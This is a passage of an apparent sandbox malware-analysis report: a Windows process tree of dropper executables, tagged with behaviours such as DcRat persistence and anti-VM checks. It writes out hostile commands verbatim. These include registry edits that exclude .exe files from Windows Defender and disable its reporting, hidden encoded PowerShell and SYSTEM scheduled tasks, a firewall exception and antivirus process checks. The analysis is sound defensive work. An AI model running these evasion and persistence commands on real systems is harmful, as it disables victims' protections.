                                                                                • Loads dropped DLL
                                                                                • Suspicious use of SetThreadContext
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                PID:79416
                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tanks.exe.pif
                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tanks.exe.pif
                                                                                  8⤵
                                                                                    PID:80552
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping -n 5 localhost
                                                                                6⤵
                                                                                • Runs ping.exe
                                                                                PID:79460
                                                                          • C:\Users\Admin\Pictures\Adobe Films\nin8SkbUWLXozgcTnEwynY6y.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\nin8SkbUWLXozgcTnEwynY6y.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:4176
                                                                          • C:\Users\Admin\Pictures\Adobe Films\u6iMmZ88_20Ph2dQEuiM4vzi.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\u6iMmZ88_20Ph2dQEuiM4vzi.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:1376
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 344
                                                                              5⤵
                                                                              • Program crash
                                                                              PID:35448
                                                                          • C:\Users\Admin\Pictures\Adobe Films\fljPY9XGj0dgkRoNu5KISNJB.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\fljPY9XGj0dgkRoNu5KISNJB.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:3776
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-KGOSI.tmp\fljPY9XGj0dgkRoNu5KISNJB.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-KGOSI.tmp\fljPY9XGj0dgkRoNu5KISNJB.tmp" /SL5="$C005E,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\fljPY9XGj0dgkRoNu5KISNJB.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Checks computer location settings
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:752
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                "C:\Windows\System32\taskkill.exe" /f /im Adblock.exe
                                                                                6⤵
                                                                                • Kills process with taskkill
                                                                                PID:66768
                                                                              • C:\Windows\system32\cmd.exe
                                                                                "cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"
                                                                                6⤵
                                                                                  PID:122084
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f
                                                                                    7⤵
                                                                                      PID:11504
                                                                                  • C:\Users\Admin\Programs\Adblock\Adblock.exe
                                                                                    "C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=9be0bf4d1664816344 --downloadDate=2022-10-03T16:57:11 --distId=marketator --pid=747
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    • Drops startup file
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:122076
                                                                                    • C:\Users\Admin\Programs\Adblock\crashpad_handler.exe
                                                                                      C:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\648277a2-2df8-4d95-0505-8cb4f14ccc14.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\648277a2-2df8-4d95-0505-8cb4f14ccc14.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\648277a2-2df8-4d95-0505-8cb4f14ccc14.run\__sentry-breadcrumb2" --initial-client-data=0x4a0,0x4a4,0x4a8,0x47c,0x4ac,0x7ff6ec78bc80,0x7ff6ec78bca0,0x7ff6ec78bcb8
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:7904
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Update-623edf62-b8b2-4ce1-9ee1-6c28535a9558\AdblockInstaller.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\Update-623edf62-b8b2-4ce1-9ee1-6c28535a9558\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:67260
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-14SNG.tmp\AdblockInstaller.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-14SNG.tmp\AdblockInstaller.tmp" /SL5="$102BE,15557677,792064,C:\Users\Admin\AppData\Local\Temp\Update-623edf62-b8b2-4ce1-9ee1-6c28535a9558\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:74656
                                                                                    • C:\Windows\system32\netsh.exe
                                                                                      C:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE
                                                                                      7⤵
                                                                                      • Modifies Windows Firewall
                                                                                      PID:77580
                                                                                    • C:\Users\Admin\Programs\Adblock\DnsService.exe
                                                                                      C:\Users\Admin\Programs\Adblock\DnsService.exe -install
                                                                                      7⤵
                                                                                      • Drops file in Drivers directory
                                                                                      • Executes dropped EXE
                                                                                      PID:77912
                                                                                    • C:\Users\Admin\Programs\Adblock\DnsService.exe
                                                                                      C:\Users\Admin\Programs\Adblock\DnsService.exe -start
                                                                                      7⤵
                                                                                      • Drops file in Drivers directory
                                                                                      • Executes dropped EXE
                                                                                      PID:77960
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    "cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"
                                                                                    6⤵
                                                                                      PID:39384
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f
                                                                                        7⤵
                                                                                        • Modifies registry key
                                                                                        PID:77184
                                                                                • C:\Users\Admin\Pictures\Adobe Films\NCLMpMyHylSDA7XNGnOOwISP.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\NCLMpMyHylSDA7XNGnOOwISP.exe"
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:4924
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\NCLMpMyHylSDA7XNGnOOwISP.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\NCLMpMyHylSDA7XNGnOOwISP.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:61484
                                                                                • C:\Users\Admin\Pictures\Adobe Films\AMfcSK8jf8MQF9r99eR0dwYn.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\AMfcSK8jf8MQF9r99eR0dwYn.exe"
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4344
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS7B5B.tmp\Install.exe
                                                                                    .\Install.exe
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:16780
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS9878.tmp\Install.exe
                                                                                      .\Install.exe /S /site_id "525403"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks computer location settings
                                                                                      • Drops file in System32 directory
                                                                                      • Enumerates system info in registry
                                                                                      PID:43536
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                        7⤵
                                                                                          PID:85340
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                            8⤵
                                                                                              PID:85920
                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                9⤵
                                                                                                  PID:121996
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                  9⤵
                                                                                                    PID:4352
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                7⤵
                                                                                                  PID:85840
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                    8⤵
                                                                                                      PID:91056
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                        9⤵
                                                                                                          PID:103120
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "gGMIFlMYb" /SC once /ST 13:52:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                      7⤵
                                                                                                      • DcRat
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:93112
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /run /I /tn "gGMIFlMYb"
                                                                                                      7⤵
                                                                                                        PID:122008
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "gGMIFlMYb"
                                                                                                        7⤵
                                                                                                          PID:69788
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\eoLFqTN.exe\" d8 /site_id 525403 /S" /V1 /F
                                                                                                          7⤵
                                                                                                          • DcRat
                                                                                                          • Drops file in Windows directory
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:77408
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\7OzgpfRjeJuJGOC110AS9IKi.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\7OzgpfRjeJuJGOC110AS9IKi.exe"
                                                                                                    4⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:1692
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                      5⤵
                                                                                                        PID:119960
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                    3⤵
                                                                                                    • DcRat
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:1588
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                    3⤵
                                                                                                    • DcRat
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:4000
                                                                                                • C:\Users\Admin\Pictures\Minor Policy\1otwkMtRp5_GVwIKMoXBdyCq.exe
                                                                                                  "C:\Users\Admin\Pictures\Minor Policy\1otwkMtRp5_GVwIKMoXBdyCq.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Adds Run key to start application
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:756
                                                                                                  • C:\Windows\SysWOW64\at.exe
                                                                                                    at 3874982763784yhwgdfg78234789s42809374918uf
                                                                                                    3⤵
                                                                                                      PID:4356
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c cmd < Film.aspx & ping -n 5 localhost
                                                                                                      3⤵
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1996
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd
                                                                                                        4⤵
                                                                                                          PID:2864
                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                            tasklist /FI "imagename eq AvastUI.exe"
                                                                                                            5⤵
                                                                                                            • Enumerates processes with tasklist
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4080
                                                                                                          • C:\Windows\SysWOW64\find.exe
                                                                                                            find /I /N "avastui.exe"
                                                                                                            5⤵
                                                                                                              PID:1940
                                                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                                                              tasklist /FI "imagename eq AVGUI.exe"
                                                                                                              5⤵
                                                                                                              • Enumerates processes with tasklist
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:3732
                                                                                                            • C:\Windows\SysWOW64\find.exe
                                                                                                              find /I /N "avgui.exe"
                                                                                                              5⤵
                                                                                                                PID:2124
                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                findstr /V /R "^otPcqYaF$" Deliver.aspx
                                                                                                                5⤵
                                                                                                                  PID:4184
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tanks.exe.pif
                                                                                                                  Tanks.exe.pif A
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  PID:2484
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tanks.exe.pif
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tanks.exe.pif Policy\1otwkMtRp5_GVwIKMoXBdyCq.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:78836
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tanks.exe.pif
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tanks.exe.pif Policy\1otwkMtRp5_GVwIKMoXBdyCq.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:78852
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tanks.exe.pif
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tanks.exe.pif Policy\1otwkMtRp5_GVwIKMoXBdyCq.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:78880
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 78880 -s 80
                                                                                                                      7⤵
                                                                                                                      • Program crash
                                                                                                                      PID:79140
                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                  ping localhost -n 5
                                                                                                                  5⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:1924
                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                ping -n 5 localhost
                                                                                                                4⤵
                                                                                                                • Runs ping.exe
                                                                                                                PID:27608
                                                                                                          • C:\Users\Admin\Pictures\Minor Policy\l8aE9N9lWV1_HGgFg0SvoaW0.exe
                                                                                                            "C:\Users\Admin\Pictures\Minor Policy\l8aE9N9lWV1_HGgFg0SvoaW0.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks computer location settings
                                                                                                            • Modifies registry class
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:1408
                                                                                                            • C:\Windows\SysWOW64\control.exe
                                                                                                              "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\9ODabgZX.cpl",
                                                                                                              3⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:4764
                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\9ODabgZX.cpl",
                                                                                                                4⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:1968
                                                                                                                • C:\Windows\system32\RunDll32.exe
                                                                                                                  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\9ODabgZX.cpl",
                                                                                                                  5⤵
                                                                                                                    PID:8028
                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\9ODabgZX.cpl",
                                                                                                                      6⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:12488
                                                                                                            • C:\Users\Admin\Pictures\Minor Policy\TAyAEuxagugqVVUAeIXAl1G8.exe
                                                                                                              "C:\Users\Admin\Pictures\Minor Policy\TAyAEuxagugqVVUAeIXAl1G8.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:4328
                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                3⤵
                                                                                                                  PID:1556
                                                                                                              • C:\Users\Admin\Pictures\Minor Policy\PAtVz5Yrv808a9sf0C9R1aUk.exe
                                                                                                                "C:\Users\Admin\Pictures\Minor Policy\PAtVz5Yrv808a9sf0C9R1aUk.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks computer location settings
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:2668
                                                                                                                • C:\Users\Admin\Pictures\Minor Policy\PAtVz5Yrv808a9sf0C9R1aUk.exe
                                                                                                                  "C:\Users\Admin\Pictures\Minor Policy\PAtVz5Yrv808a9sf0C9R1aUk.exe" -q
                                                                                                                  3⤵
                                                                                                                    PID:4796
                                                                                                                • C:\Users\Admin\Pictures\Minor Policy\CEAEns0tri805FGSiMi9wWws.exe
                                                                                                                  "C:\Users\Admin\Pictures\Minor Policy\CEAEns0tri805FGSiMi9wWws.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2248
                                                                                                                • C:\Users\Admin\Pictures\Minor Policy\cnK3LaCT71eY9loLadUKobPe.exe
                                                                                                                  "C:\Users\Admin\Pictures\Minor Policy\cnK3LaCT71eY9loLadUKobPe.exe"
                                                                                                                  2⤵
                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:2136
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                1⤵
                                                                                                                  PID:2264
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:2336
                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                    C:\Windows\system32\WerFault.exe -pss -s 452 -p 4368 -ip 4368
                                                                                                                    1⤵
                                                                                                                      PID:3224
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1380 -ip 1380
                                                                                                                      1⤵
                                                                                                                        PID:2100
                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                                                                                                        1⤵
                                                                                                                        • Process spawned unexpected child process
                                                                                                                        PID:4944
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                                                                                                          2⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:3780
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 608
                                                                                                                            3⤵
                                                                                                                            • Program crash
                                                                                                                            PID:4968
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3780 -ip 3780
                                                                                                                        1⤵
                                                                                                                          PID:1168
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1380 -ip 1380
                                                                                                                          1⤵
                                                                                                                            PID:528
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                            1⤵
                                                                                                                              PID:1308
                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                2⤵
                                                                                                                                  PID:81456
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1380 -ip 1380
                                                                                                                                1⤵
                                                                                                                                  PID:4904
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1380 -ip 1380
                                                                                                                                  1⤵
                                                                                                                                    PID:2464
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1380 -ip 1380
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4796
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1380 -ip 1380
                                                                                                                                    1⤵
                                                                                                                                      PID:4788
                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 448 -p 2040 -ip 2040
                                                                                                                                      1⤵
                                                                                                                                        PID:10636
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1380 -ip 1380
                                                                                                                                        1⤵
                                                                                                                                          PID:16544
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1376 -ip 1376
                                                                                                                                          1⤵
                                                                                                                                            PID:30208
                                                                                                                                          • C:\Windows\system32\regsvr32.exe
                                                                                                                                            regsvr32 /s C:\Users\Admin\AppData\Local\Temp\9FDB.dll
                                                                                                                                            1⤵
                                                                                                                                              PID:35408
                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                /s C:\Users\Admin\AppData\Local\Temp\9FDB.dll
                                                                                                                                                2⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:55092
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1188 -ip 1188
                                                                                                                                              1⤵
                                                                                                                                                PID:34612
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\AD1B.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\AD1B.exe
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:57388
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\AD1B.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\AD1B.exe
                                                                                                                                                  2⤵
                                                                                                                                                  • DcRat
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  PID:74384
                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                    icacls "C:\Users\Admin\AppData\Local\2df20d27-bd4d-436d-a469-13da887e59ee" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    PID:122168
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\AD1B.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\AD1B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:61712
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\AD1B.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\AD1B.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                      4⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      PID:77348
                                                                                                                                                      • C:\Users\Admin\AppData\Local\70c042d1-46ba-4931-a96c-cd53a1fad360\build2.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\70c042d1-46ba-4931-a96c-cd53a1fad360\build2.exe"
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:78048
                                                                                                                                                        • C:\Users\Admin\AppData\Local\70c042d1-46ba-4931-a96c-cd53a1fad360\build2.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\70c042d1-46ba-4931-a96c-cd53a1fad360\build2.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          PID:78296
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
